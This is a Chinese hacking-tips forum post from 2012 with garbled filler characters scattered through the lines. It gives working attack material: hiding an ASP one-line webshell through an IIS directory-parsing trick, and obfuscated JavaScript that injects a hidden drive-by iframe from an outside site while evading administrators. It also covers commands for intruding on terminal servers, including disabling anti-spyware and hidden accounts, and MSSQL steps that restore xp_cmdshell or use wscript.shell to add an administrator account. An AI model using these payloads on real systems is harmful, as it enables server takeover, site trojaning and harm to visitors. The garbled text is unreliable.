2 j/ A7 g, M" p! X; F* k+ y1、建立非标准目录:mkdir images..\
! _+ z, ]4 `- X拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp+ A: }/ r5 t" A6 w: @) l
通过web访问ASP木马:http://ip/images../news.asp?action=login E* M; ], O# ?0 o: W3 |
如何删除非标准目录:rmdir images..\ /s6 v. P. a j4 b8 |5 A2 c M
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
" B6 C: m8 e( h# I4 w( {' M. wmkdir programme.asp: L) `8 q2 x5 Q E7 f' P
新建1.txt文件内容:<!--#include file=”12.jpg”-->
{. `1 s# q0 Z8 I0 d0 q+ p9 |新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
" R/ m3 ?: a4 E. J" u4 A2 oattrib +H +S programme.asp: \& p5 o" w9 s+ D3 n
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
2 z9 \& r4 k( `7 l# |% b- f4 d9 O/ s3 h: m; J. ~) K' U
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。. H; }. V2 w9 j2 f/ b6 b8 V4 y5 x
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。$ X* [) C# a W+ \1 |! \6 [
+ V/ @$ H) g1 R1 n+ K1 D: G. J' l% ~55、JS隐蔽挂马" ?7 I; R/ m; j& L8 D3 y. j
1.6 B7 Q4 E/ k2 \; J, N( y+ |1 w. x
var tr4c3="<iframe src=ht";
3 g1 C' _$ Z0 A- K6 I* h8 P: n4 ftr4c3 = tr4c3+"tp:/";
) ]+ [ a+ a* W3 j) ntr4c3 = tr4c3+"/ww";9 Z& D- `6 u3 j6 x3 T
tr4c3 = tr4c3+"w.tr4";
; K R: v1 w5 s: k" dtr4c3 = tr4c3+"c3.com/inc/m";. P: B& |$ G7 }2 \8 U/ b0 _
tr4c3 = tr4c3+"m.htm style="display:none"></i";
) w2 e+ Y6 f# K2 @' htr4c3 =tr4c3+"frame>'";5 o% T" m& N- Q H7 O
document.write(tr4c3);( R# W. j5 F4 m* G1 U( O
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
$ h/ }* \9 N0 I( p+ T3 [$ l7 B5 @4 H8 Z7 d; e9 L" ^
2.
/ [; P5 G8 R" T! R转换进制,然后用EVAL执行。如
' U. X/ U& R3 N5 x9 H# weval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");8 w5 C2 t# ]: w( R7 _$ O& s8 `
不过这个有点显眼。
7 [% n/ U1 B( S ~* l z! A3.
0 |, r% x1 n( l7 s0 `document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
% {6 U. H) \9 ~( ?8 p* Z最后一点,别忘了把文件的时间也修改下。
1 R# Y; P! b% W+ I% T! b' T, M6 i( s& }" g& h* B
56.3389终端入侵常用DOS命令
' s3 W: ]4 M7 T% V3 Gtaskkill taskkill /PID 1248 /t) B- u6 `: B/ _# B/ C' r" b+ ?
+ t! X7 P/ _" t7 [4 F" g+ n
tasklist 查进程
" O- m | h( R1 j7 k4 W: v: F% N0 K3 h
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限4 X+ O5 O/ D7 A3 M
iisreset /reboot( O% j& b) z( H ]+ W, @
tsshutdn /reboot /delay:1 重起服务器) E2 F; I, Z7 E7 q
9 ?- @! ]: ^1 e4 K3 T/ O$ U( g* ~+ ulogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
- J( d$ V3 O) x: k n9 U: J' z$ z" e+ b! C/ g
query user 查看当前终端用户在线情况: X4 L* k4 d, {
* g# X6 C f* z6 s! N要显示有关所有会话使用的进程的信息,请键入:query process * u% L& F+ ^" s! g; ?# g
( r) @% A/ j9 ~9 j: m1 W7 {2 h要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
* O; ]! `8 E* y! }/ y6 u) y* A: n# P$ k& P# s* t
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# @* x9 x0 @- s {8 z
$ U, O! {, d4 \! e; O$ t要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02 }1 i/ g& {) ^6 ^7 f
; X4 V+ t. t) a" e: V, u命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
) q# e4 q: |( y+ Y& L
t/ q5 w4 x, y& z# k% ] {命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
X+ A+ _4 G3 U6 V2 s2 B
( T- s/ C1 D7 C0 M9 C' ?4 X命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
4 S* P+ \$ W5 F+ `) r1 I r$ ?3 b
( j; _2 `* j" C/ b- N命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机: D$ w' d# D6 n7 \% X' N
+ e" E h4 v; Q: w' n
56、在地址栏或按Ctrl+O,输入:
4 }# J b+ Y ^* f9 hjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;2 x) M! d6 p- c( v# r
" y, o% R$ I+ ~源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。" q% i" d2 R; A) z ]* X! h
4 t, n; J- d9 @0 D57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
J7 u+ W7 h0 L3 S用net localgroup administrators是可以看到管理组下,加了$的用户的。; p/ ~) O4 I+ R* t7 s" ^4 `6 I f
6 I& k1 D! Z0 c, U4 X0 ]2 W" h( ~58、 sa弱口令相关命令
8 E1 K3 S! h4 _4 M0 K; N2 |% h1 n2 F5 ]# P
一.更改sa口令方法:2 d0 h/ N$ [4 S
用sql综合利用工具连接后,执行命令:
/ o) W) v3 z9 w7 Nexec sp_password NULL,'20001001','sa'
* E6 Y; }7 Z/ s; d(提示:慎用!)1 D; [1 k) f G% F$ D
) i+ Y. T7 j" i$ q2 q$ J二.简单修补sa弱口令.) v) x8 s+ ^" N. ^5 ^+ @$ N
G) l* Y' j0 X方法1:查询分离器连接后执行:
0 @$ l0 t- r* T2 d4 rif exists (select * from
2 |, L* u# p {4 Cdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and1 p" q" l+ p9 b( W% `& ]1 n
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)3 l1 I7 n5 c/ o9 R
) X1 B$ J' z+ k# |6 e: z& z0 Yexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
/ D/ Q. F' ]8 T$ P+ w
1 M" H* ~: X8 ]% v# g8 uGO
! u% Y9 O8 z4 R% T& q4 [
7 l& y, G0 ~. }; A1 v+ e然后按F5键命令执行完毕
9 V" {1 ?6 g2 f4 `: [4 D0 K0 x) t; h% L) Z7 H. S& p
方法2:查询分离器连接后& D( v: A7 J$ q; Y5 ^- ~
第一步执行:use master8 v$ x) F9 `9 G
第二步执行:sp_dropextendedproc 'xp_cmdshell'0 G' V4 t1 |8 b7 M7 W& D4 ]
然后按F5键命令执行完毕; H* v5 L ^ d- c1 B. e
' U3 ?6 ^ l" S. z
* R% x) a) ?! `
三.常见情况恢复执行xp_cmdshell.7 Z( O% O( T6 d" v- M" K
2 @. w, f/ x. g) x2 h- B, q* i0 E- O& h( I# _
1 未能找到存储过程'master..xpcmdshell'.
8 |% O9 n( ^# }: q/ M t 恢复方法:查询分离器连接后,8 L6 k1 ^) g, N3 {6 z: W c- a; l
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
7 G3 F0 V! {! H& O3 P& m1 E) J第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
/ N' m9 a" ~" V3 a然后按F5键命令执行完毕
+ ?& A8 |& O. `1 B# Y: {( L" H, k" O
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
1 s7 e- z" Q- Z. o, R- A恢复方法:查询分离器连接后,1 Y% y( s: H/ J' I+ v
第一步执行:sp_dropextendedproc "xp_cmdshell"0 y( h* A. ?$ y: V2 G- r
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 Y5 P( F$ z7 l7 J
然后按F5键命令执行完毕' ]" M# @# o; q F
2 _+ c6 i3 U4 i e9 F7 z
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( x/ j; f3 X% G7 J: A6 Y
恢复方法:查询分离器连接后,
8 K$ F1 p4 H3 m7 D9 f第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
7 c+ x3 U G1 R2 ]" s% ^第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
; ?0 F/ z# T) I; t2 V然后按F5键命令执行完毕+ P0 |: r% N$ A- s
- ?( s* O9 d* `6 O( y+ G+ w3 N四.终极方法.
3 S) d2 _4 |6 L- o如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:% V" F' e% C# [ E7 Q
查询分离器连接后,( j( h* Z* z' Z: ]+ }: h0 r4 H2 Q, P
2000servser系统:
, b+ @( A! B) ]+ V- Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'+ \5 m: T" g6 R; o
. O! O8 p9 [& D% O' h
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
( A7 T `4 q# }- c
" v, {, e+ `, V. E9 S" P5 n* hxp或2003server系统:
1 S- g; {: @) B8 Y: G
" M; D' d9 I/ B+ R/ d! {declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
3 F% y" ]0 M; R; i7 R+ F8 c
5 u3 [4 u! c% ]+ C& ^- Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
6 Y& G1 S% A, q8 Y0 ^( Z( {1 j. Y |
发表于 2012-9-15 14:13:15
收藏
支持
反对